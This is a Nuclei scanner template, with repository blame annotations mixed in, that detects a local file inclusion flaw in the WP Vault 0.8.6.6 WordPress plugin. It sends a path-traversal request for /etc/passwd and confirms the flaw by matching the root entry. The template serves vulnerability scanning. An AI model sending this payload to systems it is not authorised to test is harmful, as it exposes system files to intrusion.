nuclei-templates/vulnerabilities/wordpress/wp-vault-lfi.yaml

id: wp-vault-local-file-inclusion

info:
  name: WP Vault 0.8.6.6 – Local File Inclusion
  author: 0x_Akoko
  severity: high
  reference: https://www.exploit-db.com/exploits/40850
  tags: wp-plugin,wordpress,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
-												Create wp-vault-lfi.yaml
											
										
										
											2021-07-03 09:51:16 +00:00
+								id: wp-vault-local-file-inclusion
 								info:
-												Update and rename wp-vault-lfi.yaml to vulnerabilities/wordpress/wp-vault-lfi.yaml
											
										
										
											2021-07-05 15:36:50 +00:00
+								  name: WP Vault 0.8.6.6 – Local File Inclusion
-												Create wp-vault-lfi.yaml
											
										
										
											2021-07-03 09:51:16 +00:00
+								  author: 0x_Akoko
 								  severity: high
 								  reference: https://www.exploit-db.com/exploits/40850
-												Update wp-vault-lfi.yaml
											
										
										
											2021-07-05 15:35:48 +00:00
+								  tags: wp-plugin,wordpress,lfi
-												Create wp-vault-lfi.yaml
											
										
										
											2021-07-03 09:51:16 +00:00
 								requests:
 								  - method: GET
 								    path:
 								      - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
 								    matchers-condition: and
 								    matchers:
 								      - type: regex
 								        regex:
 								          - "root:[x*]:0:0"
 								      - type: status
 								        status:
 								          - 200